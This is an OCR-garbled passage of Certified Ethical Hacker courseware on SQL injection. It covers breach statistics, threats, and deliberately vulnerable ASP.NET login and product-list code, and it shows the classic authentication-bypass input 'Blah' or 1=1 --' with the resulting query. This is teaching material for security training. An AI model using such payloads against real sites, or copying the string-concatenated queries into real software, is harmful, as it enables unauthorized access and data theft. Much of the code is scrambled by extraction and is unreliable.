Mais conteúdo relacionado Semelhante a Ce hv8 module 14 sql injection (20) Ce hv8 module 14 sql injection1. S Q L In je c tio n
Module 14
2. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
SQL Injection
IV/lnrlnlo 1A
E t h ic a l H a c k i n g a n d C o u n t e r m e a s u r e s V8
M o d u l e 1 4 : S Q L I n je c t io n
E x a m 3 1 2 -5 0
Module 14 Page 1987
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
3. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Security News
Barclays: 97 Percent of Data Breaches
Still due to S Q L Injection
SQ injection attacks have been around for m than ten years,
L
ore
an security professionals are m than capable of protecting
d
ore
ag st them yet 9 percent of data breaches worldwide are still due
ain
;
7
to an SQ injection som here along the lin according to N Jones,
L
ew
e,
eira
head of paym security for Barclaycard.
ent
Speaking at the Infosecurity Europe Press Conference in London this w
eek,
Jones said that hackers are taking advantage of businesses with inadequate
an often outdated inform
d
ation security practices. C g the m recent
itin
ost
fig res fromthe N
u
ational Fraud A
uthority, she said that identity fraud co
sts
the U m than £ .7 b n every year, and affects m than 1 m n
K ore
2 illio
ore
.8 illio
people.
"Data breaches have becom a statistical certainty," saidJones. "If you look
e
at w the p b individ is concerned about, protecting personal
hat
u lic
ual
inform
ation isactually at the sam level inthe scale of p lic social concerns
e
ub
as preventing crim
e."
ז
http://news.techworld.com
Copyright © b y EG-GlOOCil. All Rights Reserved. Reproduction is Strictly Prohibited.
S e c u rity N ew s
Neuis
B a r c l a y s : 97 P e r c e n t o f D a t a B r e a c h e s S t i l l D u e t o S Q L
In je c tio n
Source: http://news.techworld.com
SQL injection attacks have been around for more than ten years, and security professionals are
more than capable of protecting against them; yet 97 percent of data breaches worldwide are
still due to an SQL injection somewhere along the line, according to Neira Jones, head of
payment security for Barclaycard.
Speaking at the Infosecurity Europe Press Conference in London this week, Jones said that
hackers are taking advantage of businesses with inadequate and often outdated information
security practices. Citing the most recent figures from the National Fraud Authority, she said
that identity fraud costs the UK more than £2.7 billion every year, and affects more than 1.8
million people.
"Data breaches have become a statistical certainty," said Jones. "If you look at what the public
individual is concerned about, protecting personal information is actually at the same level in
the scale of public social concerns as preventing crime."
Module 14 Page 1988
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
4. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
SQL injection is a code injection technique that exploits security vulnerability in a website's
software. Arbitrary data is inserted into a string of code that is eventually executed by a
database. The result is that the attacker can execute arbitrary SQL queries or commands on the
backend database server through the web application.
In October
2011,
for example, attackers planted malicious JavaScript on Microsoft's ASP.Net
platform. This caused the visitor's browser to load an iframe with one of two remote sites.
From there, the iframe attempted to plant malware on the visitor's PC via a number of browser
drive-by exploits.
Microsoft has been offering ASP.Net programmers information on how to protect against SQL
injection attacks since at least 2005. However, the attack still managed to affect around
180,000 pages.
Jones said that, with the number of interconnected devices on the planet set to exceed the
number of humans by 2015, cybercrime and data protection need to take higher priority on the
board's agenda. In order for this to happen, however, the Chief Information Security Officer
(CISO) needs to assess the level of risk within their organisation, and take one step at a time.
"I always say, if anyone says APT [advanced persistent threat] in the room, an angel dies in
heaven, because APTs are not the problem," said Jones. "I'm not saying that they're not real,
but let's fix the basics first. Are organisations completely certain they're not vulnerable to SQL
injections? And have they coded their web application securely?"
Generally it takes between 6 and 8 months for an organisation to find out it has been breached,
Jones added. However, by understanding their risk profile and taking simple proactive
measures, such as threat scenario modelling, companies could prevent 87 percent of attacks.
Copyright © IDG 2012
By Sophie Curtis
http://news.techworld.com/securitv/3331283/barclavs-97-percent-of-data-breaches-still-due-tosal-iniection/
Module 14 Page 1989
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
5. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
M odule Objectives
J
Network Reconnaissance Using SQL
Injection
J
SQL Injection Tools
J
J
Evasion Technique
How to Defend Against SQL Injection
Attacks
J
SQL Injection Detection
Password Grabbing
J
SQL Injection Detection Tools
SQL Injection Attacks
J
Bypass Website Logins Using SQL
Injection
J
J SQL Injection
J
J
SQL Injection Attack Characters
J Testing for SQL Injection
J Types of SQL Injection
J
Blind SQL Injection
J
CEH
SQL Injection Methodology
J Advanced SQL Injection
Copyright © b y EG-GlOOCil. All Rights Reserved. Reproduction is Strictly Prohibited.
M o d u le O b je c tiv e s
This module introduces you the concept of SQL injection and how an attacker can
exploit this attack methodology on the Internet. At the end of this module, you will be familiar
with:
e
SQL Injection
©
Advanced SQL Injection
e
SQL Injection Attacks
s
Bypass Website Logins Using SQL Injection
e
SQL Injection Detection
Q
Password Grabbing
Q
SQL Injection Attack Characters
Q
Network Reconnaissance Using SQL Injection
0
Testing for SQL Injection
e
SQL Injection Tools
e
Types of SQL Injection
e
Evasion Technique
e
Blind SQL Injection
e
How to Defend Against SQL Injection Attacks
e
SQL Injection Methodology
Q
SQL Injection Detection Tools
Module 14 Page 1990
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
6. Ethical Hacking and Countermeasures
SQL Injection
I i
Exam 312-50 Certified Ethical Hacker
M o d u le F lo w
To understand SQL injection and its impact on the network or system, let us begin
with the basic concepts of SQL injection. SQL injection is a type of code injection method that
exploits the safety vulnerabilities that occur in the database layer of an application. The
vulnerabilities mostly occur due to the wrongly filtered input for string literal escape characters
embedded in SQL statements from the users or user input that is not strongly typed and then
suddenly executed without correcting the errors.
Module 14 Page 1991
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
7. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
*
SQL Injection Concepts
Testing for SQL Injection
^
Advanced SQL Injection
SQL Injection Tools
Types of SQL Injection
) :^ ן
^
Evasion Techniques
Blind SQL Injection
y —
Countermeasures
v— ׳
SQL Injection Methodology
This section introduces you to SQL injection and the threats and attacks associated with it.
Module 14 Page 1992
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
8. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
SQL Injection
cs
Q SQL Injection is the
9 It is a fla w in W e b
©
Q M o st program m ers are
most com m on w e b site
A p p licatio n s and not a
still not a w a re of this
v u ln e ra b ility on the
database or w eb
threat
Internet
se rver issue
©
Copyright © b y EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
1
SQ
L
SQL In je c tio n
SQL injection is a type of web application vulnerability where an attacker can
manipulate and submit a SQL command to retrieve the database information. This type of
attack mostly occurs when a web application executes by using the user-provided data without
validating or encoding it. It can give access to sensitive information such as social security
numbers, credit card numbers, or other financial data to the attacker and allows an attacker to
create, read, update, alter, or delete data stored in the backend database. It is a flaw in web
applications and not a database or web server issue. Most programmers are still not aware of
this threat.
Module 14 Page 1993
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
9. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Scenario
v o la tility s u b d u e d
_ —
« ■rt. רד 3 ־Q u 1j .
v
Albert Gonzalez, an indicted hacker stole 130 million credit
and debit cards, the biggest identity theft case ever prosecuted
in the United States. He used SQL injection attacks to install
sniffer software on the companies' servers to intercept credit
card data as it was being processed.
http ://www. theregister.co. uk
pro**—
1 B u s i n e s s
^
w o r l d
—•■nomic upturn
0
p 1
1
.
m
l s t i c
lid a s s e t s
Copyright © b y EC-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
a
S c e n a rio
Albert Gonzalez, an indicted hacker stole 130 million credit and debit cards,
performed the biggest identity theft case ever prosecuted in the United States. He used SQL
injection attacks to install sniffer software on companies' servers to intercept credit card data
as it was being processed.
Module 14 Page 1994
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
10. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
SQL Injection Is the M ost
Prevalent Vulnerability in 2012
CEH
SQL Injection
Unknown
DD0S
D efacem ent
Targeted Attack
DNS Hijack
Password Cracking
Account Hijacking
Java Vulnerability
Other
http://hackmageddon.com
Copyright © b y
EG-G*ancil. All
Rights Reserved. Reproduction Is Strictly Prohibited.
Source: http://hackmageddon.com
According to http://hackmageddon.com. SQL injection is the most commonly used attack by
the attacker to break the security of a web application.
From the following statistics that were recorded in September 2012, it is clear that, SQL
injection is the most serious and mostly used type of cyber-attack performed these days when
compared to other attacks.
Module 14 Page 1995
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
11. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
SQL Injection
Unknown
DDoS
Defacement
Targeted Attack
DNS Hijack
Password C
racking
Account Hijacking
Java Vulnerability
Other
FIGURE 14.1: SQL Injection
Module 14 Page 1996
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
12. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
SQL Injection Threats
CEH
U rtifM
IthKJl lUckM
O Spoofing Identity
C
hanging Price
Tam w
per ith
D
atabase Records^ '/ •.
- ־׳
M
odifying Records :
Escalation of
Privileges
Voiding Machine's
^Critical Transactions
D
enial־of־Service
on the Server
Complete Disclosure of
all Data on the System .
D
estruction
of D
ata
Copyright © by EG-GtUIICil. All Rights R eserved. Reproduction is Strictly Prohibited
y
SQL In je c tio n T h re a ts
The following are the major threats of SQL injection:
9
Spoofing identity: Identity spoofing is a method followed by attackers. Here people are
deceived into believing that a particular email or website has originated from the source
which actually is not true.
© Changing prices: One more of problem related to SQL injection is it can be used to
modify data. Here the attackers enter into an online shopping portal and change the
prices of product and then purchase the products at cheaper rates.
Q
Tamper with database records: The main data is completely damaged with data
alteration; there is even the possibility of completely replacing the data or even deleting
the data.
Q
Escalation of privileges: Once the system is hacked, the attacker seeks the high
privileges used by administrative members and gains complete access to the system as
well as the network.
9
Denial-of-service on the server: Denial-of-service on the server is an attack where users
aren't able to access the system. More and more requests are sent to the server, which
can't handle them. This results in a temporary halt in the services of the server.
Module 14 Page 1997
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
13. Ethical Hacking and Countermeasures
SQL Injection
0
Exam 312-50 Certified Ethical Hacker
Complete disclosure of all the data on the system: Once the network is hacked the
crucial and highly confidential data like credit card numbers, employee details, financial
records, etc. are disclosed.
0
Destruction of data: The attacker, after gaining complete control over the system,
completely destroys the data, resulting in huge losses for the company.
© Voiding system's critical transaction: An attacker can operate the system and can halt
all the crucial transactions performed by the system.
0
Modifying the records: Attackers can modify the records of the company, which proves
to be a major setback for the company's database management system.
Module 14 Page 1998
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
14. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
-
What Is SQL Injection?
CEH
SQL injection is a technique used to take advantage of non-validated
input vulnerabilities to pass SQL commands through a web application
for execution by a backend database
SQL injection is a basic attack used to either gain unauthorized access to
a database or to retrieve information directly from the database
Copyright © b y EG-GlOOCil. All Rights Reserved. Reproduction is Strictly Prohibited.
SOL
W h a t Is SQL In je c tio n ?
Structured Query Language (SQL) is basically a textual language that enables
interaction with a database server. SQL commands such as INSERT, RETRIEVE, UPDATE, and
DELETE are used to perform operations on the database. Programmers use these commands to
manipulate data in the database server.
SQL injection is defined as a technique that takes advantage of non-validated
input
vulnerabilities and injects SQL commands through a web application that are executed in a
back-end
database.
Programmers
use
sequential
SQL
commands
with
client-supplied
parameters making it easier for attackers to inject commands. Attackers can easily execute
random SQL queries on the database server through a web application. Attackers use this
technique to either gain unauthorized access to a database or to retrieve information directly
from the database.
Module 14 Page 1999
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
15. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
J On the basis of application used and the way it processes user supplied data, SQL injection
can be used to implement the attacks mentioned below:
A u th e n tic a tio n B y p a s s
U gth attack, an attacker lo sonto anap lication
sin is
g
p
w
ithout p vid gvalid u nam an p o
ro in
ser
e d assw rd
an g s ad inistrative p
d ain m
rivileg
es
R e m o te C o d e E x e c u t io n
In fo r m a t io n D is c lo s u r e
It assistsan attacker to
com
prom the host O
ise
S
U gth attack, anattacker
sin is
o tain sen
b s sitive inform
ation that
issto inthe d ase
red
atab
C o m p r o m is e d
C o m p r o m is e d D a ta In t e g r it y
A v a ila b ilit y o f D a ta
A attacker u th attackto d
n
ses is
eface a
w p e in m
eb ag , sert aliciouscontent in
to
w p es, or alter the contents of a
eb ag
d ase
atab
A
ttackers u th attacktodelete
se is
the d
atabase in ation delete
form ,
lo , or au it in ation that is
g
d form
sto ina d ase
red
atab
/Copyright © b y EG-CMMCil. All Rights JteSeivecL R ep ro d u ctio n is Strictly Prohibited.
SQL In je c tio n A tta c k s
Based on the application and how it processes user-supplied data, SQL injection can be
used to perform the following types of attacks:
a
Authentication bypass: Here the attacker could enter into the
network without
providing any authentic user name or password and could gain the access over the
network. He or she gets the highest privilege in the network.
Q Information disclosure: After unauthorized entry into the network,
the attacker gets
access to the sensitive data stored in the database.
Q
Compromised data integrity: The attacker changes the main content of the website and
also enters malicious content into it.
Compromised availability of data: The attacker uses this type of attack to delete the
data related to audit information or any other crucial database information.
Remote code execution: An attacker could modify, delete, or create data or even can
create new accounts with full user rights on the servers that share files and folders. It
allows an attacker to compromise the host operating system.
Module 14 Page 2000
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
16. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
How Web Applications Work
CEH
h ttp://juggyboy.com /?id= 6329& print= Y
Internet
W e b S erver
Firew all
OS System Calls
Operating System
ID
Tech
W e b A pplication
Topic
6329
DBM S
SELECT * from news where id = 6329
CNN
O utput
Copyright © b y
EC-ClUIICil. All
Rights Reserved. Reproduction is Strictly Prohibited.
H ow W eb A p p lic a tio n s W ork
A web application is a software program accessed by users over a network through a
web browser. W eb applications can be accessed only through a web browser (Internet
Explorer, Mozilla Firefox, etc.). Users can access the application from any computer of a
network. Based on web applications, web browsers also differ to some extent. Overall
response time and speed is dependent on connection speed.
Step 1: The user requests through the web browser from the Internet to the web server.
Step 2: The W eb Server accepts the request and forwards the request sent by the user to the
applicable web application server.
Step 3: The web application server performs the requested task.
Step 4: The web applications accesses the entire database available and responds to the web
server.
Step 5: The web server responds back to the user as the transaction is complete.
Step 6: Finally the information that the user requested appears on the monitor of the user.
Module 14 Page 2001
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
17. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
ID
Topic
New s
6329
Tech
CNN
SELECT * from news where id = 6329
FIGURE 14.2: Working of Web Applications
Module 14 Page 2002
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
18. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Server-side Technologies
CEH
Powerful server-side technologies like ASP.NET and
database servers allow developers to create dynam
ic,
data-driven websites with incredible ease
The power of ASP.NETand SQL can easily be exploited
by hackers using SQL injection attacks
SQL
Server
A relational databases,SQLServer, Oracle, IBM D
ll
B2,
and MySQL, are susceptible to SQL-injection attacks
SQ injection attacks do not exploit a specific softw
L
are
vulnerability, instead they target websites that do not
follow secure coding practices for accessing and
m
anipulating data stored in a relational database
Copyright © b y EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
S e rv e r-sid e T e c h n o lo g ie s
This technology is used on the server side for client/server technology. For achieving
business success, not only information is important, but we also need speed and efficiency.
Server-side technology helps us to smoothly access, deliver, store, and restore information.
Various server-side technologies include: ASP, ASP.Net, Cold Fusion, JSP, PHP, Python, and Ruby
on Rails. Server side technologies like ASP.NET and SQL can be easily exploited by using SQL
injections.
Q
Powerful server-side technologies like ASP.NET and database servers allow developers
to create dynamic, data-driven websites with incredible ease.
Q
All relational databases, SQL Server, Oracle, IBM DB2, and MySQL, are susceptible to
SQL injection attacks.
e
SQL injection attacks do not exploit a specific software vulnerability; instead they target
websites that do not follow secure coding practices for accessing and manipulating data
stored in a relational database.
The power of ASP.NET and SQL can easily be exploited by attackers using SQL injection
attacks.
Module 14 Page 2003
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
19. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
CEH
HTTP Post R equest
h ttp :// ju ggyb oy.com /lo gon .aspx ?usern am e= bart& p assw ord= sim p so n
Account Login
Usern am e
Password
J
^ b art
simp!
W h e n a user provides inform ation and clicks
Subm it, th e brow ser subm its a string to th e w eb
server th at contains the user's credentials
This string is visible in th e body of the HTTP or
HTTPS POST request as:
SQL query at the database
select * from Users where
(username = 1 a r t 1 and
b
password = •simpson1);
<form action-"/cgi-bin/login”
me thod-pos t>
Username: <input type-text
name-username>
Password: <input
type=password name=password>
<input type=submit
value=Login>
■a••■........... .............. ................ .......................... ..
Copyright © b y
EG-G*ancil. All
Rights Reserved. Reproduction is Strictly Prohibited.
H TTP P ost R eq u est
An HTTP POST request creates a way of passing larger sets of data to the server. The
HTTP POST requests are ideal for communicating with an XM L web service. These methods are
designed for data submission and retrieval on a web server.
W hen a user provides information and clicks Submit, the browser submits a string to the web
server that contains the user's credentials. This string is visible in the body of the HTTP or
HTTPS POST request as:
SQL query at the database
s e le c t * from U sers where (username = ,b a r t '
and password = 's im p s o n ');
<form a c tio n = "/ c g i- b in / lo g in " method=post>
Username: < input typ e= text name=username>
Password: <input type=password name=password>
C in p ut type=submit value=Login>
Module 14 Page 2004
Ethical Hacking and Countermeasures Copyright © by EC-COUIICil
All Rights Reserved. Reproduction is Strictly Prohibited.
20. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Example 1: Normal SQL Query
I Q Q
http://juggyboy.com/BadLogin.aspx
B a d L o g in . a s p x . c s
p r iv a t e
v o id
c m d L o g in
S y s te m . E v e n tA r g s
{
9
jy B o y .c o m
s trin g
s trC n x
C lic k (o b je c t
se n d e r,
e )
=
" se rve r=
l o c a l h o s t ; d a t a b a s e = n o r t h w i n d /u i d = s a ; p w d = ; " ;
S q lC o n n e c tio n
cnx
= new
S q lC o n n e c t io n (s tr C n x )
c n x .O p e n ( ) ;
/ / T h is
code
is
s u s c e p t ib le
to
SQ L
in je c t io n
a tta c k s .
string strQry = "SELECT Count(*) FROM
Users W HERE U s e r N a m e + "' ־t x t U ser.Text +
" יAND Password + "י ־txtPasswo r d . T e x t +
in t
in tR e c s ;
S q lC o m m a n d
in t R e c s
Web Browser
i f
■
cm d
■ new
(in t)
(in t R e c s > 0 )
S q lC o m m a n d (s tr Q r y ,
cnx) ;
cm d.E x e c u t e S c a la r ( ) ;
{
F o r m s A u t h e n t ic a t io n .R e d ir e c tF r o m L o g in P a g e (tx tU s e r
.T e x t,
f a ls e );
lb lM s g .T e x t
C onstructed SQ L Q u e ry
<■
}
e ls e
— ״L o g in
{
a tte m p t
fa ile d .; ״
)
c n x .C lo s e ( ) ;
>
SELECT Count(*) FROM Users WHERE
UserName=״Jason1 AND Password י ־Springfield
1
Server-side Code (BadLogin.aspx)
/Copyright © b y EC - C M IC il. All Rights JteServ ed lR ep ro d u ctio n Is Strictly Prohibited.
E x a m p l e 1: N o r m a l S Q L Q u e r y
Here the term "query" is used for the commands. All the SQL code is written in the
form of a query statement and finally executed. Various data operations of the SQL queries
include selection of the data, inserting/updating of the data, or creating data objects like
databases and tables with SQL. All the query statements begin with a clause such as SELECT,
UPDATE, CREATE, and DELETE.
SQL Query Examples:
Module 14 Page 2005
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
21. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
■ף
hup://]uggyboy ( 0ii1/B«kI login wvpx
B
J u g g y B o y .c o m
b o d L o g rn . a c p x . ce
p r i v a t e v o i d c m d L o g 1 n _ C 1 1 c k (o b je c t s e n d e r ,
S y s te n .E v e n tA r g s e)
< s t r i n g s trC n x =
• s e r v o r=
׳
lo c A l h o s t ; d a t a b a a o ־n o r t h H 1 n d ;u i d - s a ?p w d - ; " ;
S q l C o n n e c t io n c n x = new S q l C o n n e c t i o n ( s t r C n x ) ;
c n x . Open ( ) ;
/ / T h is cod e i s
a tta c k s .
s trin g
U se rs
" י
W eb Brow ser
Constructed SQL Query
SELEC T
C o u n t(• )
U s e r N a 1*e = ' • T a s o n '
FRO M U s e r s
AN D
W HERE
W HERE
AND
s u s c a p t ib le
s trQ ry
=
to
״SELEC T
U se rN a m e = ' ״
P a s s w o r d * '"
+
SQ L i n j e c t i o n
C o u n t ( * )׳
+
FRO M
tx tU s e r.T e x t
tx tP a s s w o rd . T e x t
+
+
i n t m tR e c s ;
S q lC o aaa an d e n d = new SqlCom m and ( s t r Q r y , c n x ) :
m t R e c s = ( i n t ) crad . E x e c u t e S c a l a r () ;
i f (in t R e c s > 0 ) {
F o r m s A u t h e n t ic a t io n . R e d ir e c t F r o m L o g in P a g e ( t x t U s e r
.T e x t, f a l s e ) ; ) e l s e {
lf c lM s g . T e x t = " L o g i n a t t e m p t f a i l e d . " ; }
c n x .C lo s e () ;
)
P a s s w o rd ' ־S p r in g f ie ld *
Server Side Code (BadLogin.aspx)
FIGURE 14.3: SQL Query Exam
ple
Module 14 Page 2006
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
22. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
CEH
Example 1: SQL Injection Query
I Q Q
http://juggyboy.com/BadLogin.aspx
9
jy B o y .c o m
Attacker Launching SQL Injection
SELECT Count(*) FR M Users W ERE UserNam Blah' or 1 1 --1 A D Password='Springfield1
O
H
e=1
=
N
SELECT Count(*) FR M Users W ERE UserNam Blah' or 1 1
O
H
e=י
=
—' A D Password='Springfield1
N
SQL Query Executed
Code after — are now com ents
m
Copyright © b y EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
ןE x a m p l e 1: S Q L I n j e c t i o n Q u e r y
The most common operation in SQL is the query, and it is performed with the
declarative SELECT statement. This SELECT command retrieves the data from one or more
tables. SQL queries allows a user to describe or assign the desired data, and leave the DBMS
(Data Base Management System) as responsible for optimizing, planning, and performing the
physical operations. A SQL query includes a list of columns to be included in the final result of
the SELECT keyword.
If the information submitted by a browser to a web application is inserted into a database
query without being properly checked, then there may be a chance of occurrence of SQL
injection. HTML form that receives and passes the information posted by the user to the Active
Server Pages (ASP) script running on IIS web server is the best example of SQL injection. The
information passed is the user name and password. By querying a SQL server database these
two data items are checked.
username B la h ' o r 1=1 —
password S p r in g f ie ld
The query executed is:
SELECT C o u n t(*)
FROM U sers
Password ' ־S p r i n g f i e l d 1;
Module 14 Page 2007
WHERE
UserName=' B la h '
or
1=1
--
AND
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
23. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
However, the ASP script builds the query from user data using the following line:
B la h query = 1SELECT * FROM u sers WHERE username = 1" + B la h 1 or 1=1 —
1
+ ' ״AND password =
+ S p r in g f ie ld +
If the user name is a single-quote character (') the effective query becomes:
SELECT
*
FROM
' [S p r in g fie ld ]';
s e rs
WHERE
username
=
111
AND
password
=
This is invalid SQL syntax and produces a SQL server error message in the user's browser:
M ic r o s o ft OLE DB P r o v id e r f o r ODBC D r iv e r s e r r o r
'80040el4'
[M icro so ft][O D B C SQL S e r v e r D r iv e r ][S Q L S e rv e r]U n c lo s e d q u o ta tio n mark
b e fo re the c h a r a c te r s t r in g
' יand p assw ord = ''.
/ lo g in .a s p , l i n e 16
The quotation mark provided by the user has closed the first one, and the second generates an
error, because it is unclosed. At this instance, to customize the behavior of a query, an attacker
can begin injecting strings into it. The content proceeding the double hyphes (--) signify a
Transact-SQL comment.
0®£
13©
nttp://|usfivt>0Y com/Badiofiin.aspx
^
B o y .c o m
p a ■ 1=1•- !
Blah ־or
[
SELECT Count(*)
Springfield
< ..................................
A ttacker Launching SQ L Injectio n
FROM Users WHERE UserName” יB l a h ' or 1"1 --' AND Password' ״Springfield'
SQ L Q u e ry Executed
Code after —
are com ments
FIGURE 14.4: SQL Injection Query Exam
ple
Module 14 Page 2008
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
24. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
CEH
Exam ple 1: Code Analysis
When the attacker enters blah' or
1 1 - then the SQL query w
= ill
look like:
SELECT Count(*) FRO
M
Users W
HERE
UserName='blah יOr 1 1 —
=
יA D Password=''
N
Because a pair of hyphens
designate the beginning of a
com ent in SQ the query sim
m
L,
ply
becom
es:
SELECT Count(*) FRO
M
Users W
HERE
UserName='blah' Or 1 1
=
A user enters a user name and
password that matches a
record in the user's table
J A dynamically generated SQL
query is used to retrieve the
number of matching rows
J The user is then authenticated
and redirected to the
requested page
string strQry = "SELECT Count(*)
FROM Users WHERE U s e r N a m e + "' ־
txtUser.Text +
AND Password" ־
+ t x t P a s s w o r d .Text + . ;
.
Copyright © b y EG-GlOOCil. All Rights Reserved. Reproduction is Strictly Prohibited.
E x a m p l e 1: C o d e A n a l y s i s
Code analysis is the process of automated testing of the source code for the purpose
of debugging before the final release of the software for the purpose of sale or distribution.
a
A user enters a user name and password that matches a record in the Users table
©
A dynamically generated SQL query is used to retrieve the number of matching rows
© The user is then authenticated and redirected to the requested page
W hen the attacker enters blah' or 1=1 - then the SQL query can look like:
SELECT Count
Password' ' ־
(*)
FROM
U sers
WHERE
UserName=' b l a h '
Or
1=1
— '
AND
Because a pair of hyphens designates the beginning of a comment in SQL, the query simply
becomes:
SELECT Count (*)
FROM U sers WHERE UserName=' b la h ' Or 1=1
s t r in g
s trQ ry = "SELECT C o u n t(*)
FROM U sers WHERE
tx tU s e r .T e x t + 1 ' AND Passw ord= '" + tx tP a s s w o rd . Text +
1
Module 14 Page 2009
UserName='"
+
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
25. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Example 2: BadProductList.aspx
CEH
This page displays products
GO
p r iv a te
from the Northwind
database and allows users
http://juggyboy.com/BadProductList.aspx
to filter the resulting list of
v o id
c m d F ilt e r _ C lic }c (o b je c t
d g r P r o d u c t s . C u r re n tP a g e ln d e x
b in d D a ta G r id ( ) ; }
sen d e r.
S y s te m .E v e n tA r g s
e)
products using a textbox
called txtFilter
{
= 0;
p r i v a t e v o id b in d D a t a G r id () {
d g rP ro d u c ts .D a ta S o u rc e = c r e a t e D a t a V ie w ();
d g r P r o d u c ts .D a ta B in d ( ) ;
p r iv a te
D a t a V ie w
)
c re a te D a ta V ie w ()
Lik the previous
e
exam (BadLogin.aspx),
ple
this code isvulnerable to
SQ injection attacks
L
{
s t r in g s trC n x =
" s e r v e r ־l o c a l h o s t ; u id = s a ;p w d = ; d a ta b a s e ־n o r t h w in d ; " ;
s trin g
s trS Q L -
"S E L E C T
"Q u a n tity P e r U n it ,
/ / T h is
i f
code
is
P r o d u c t ld ,
U n it P r ic e
s u s c e p t ib le
to
( t x t F i l t e r .T e x t . L e n g th
8 trS Q L
S q lC o n n e c t io n
+״
״
cnx
W H ERE
P ro d u c tN a m e ,
"
SQ L i n j e c t i o n
> 0)
a tta c k s .
{
P ro d u c tN a m e
L IK E
״י
+
t x t F i l t e r .T e x t
• <
;״
« new S q l C o n n e c t i o n ( s t r C n x ) ;
־־
S q l D a t a A d a p t e r s d a = new S q l D a t a A d a p t e r ( s t r S Q L ,
D a t a T a b le d t P r o d u c t s = new D a t a T a b l e ( ) ;
sd a.F ill(d t P r o d u c t s );
re tu rn
♦
FROM P r o d u c t s " ;
The executed SQ is
L
constructed dynam
ically
froma u
ser-su p
p lied
in u
pt
c n x );
Attack Occurs Here
d tP r o d u c ts .D e fa u ltV ie w ;
Copyright © b y
EG-Giancil. All
Rights Reserved. Reproduction is Strictly Prohibited.
E x a m p l e 2: B a d P r o d u c t L i s t . a s p x
Source: http://msdn.microsoft.com
This page displays products from the Northwind database and allows users to filter the
resulting list of products using a textbox called txtFilter. Like the last example, the page is ripe
for SQL injection attacks because the executed SQL is constructed dynamically from a userentered value. This particular page is a hacker's paradise because it can be hijacked by the
astute hacker to reveal secret information, change data in the database, damage the database
records, and even create new database user accounts.
Most SQL-compliant databases including SQL Server, store metadata in a series of system tables
with the names sysobjects, syscolumns, sysindexes, and so. This means that a hacker could use
the system tables to ascertain schema information for a database to assist in the further
compromise of the database. For example, the following text entered into the txtFilter textbox
might be used to reveal the names of the user tables in the database:
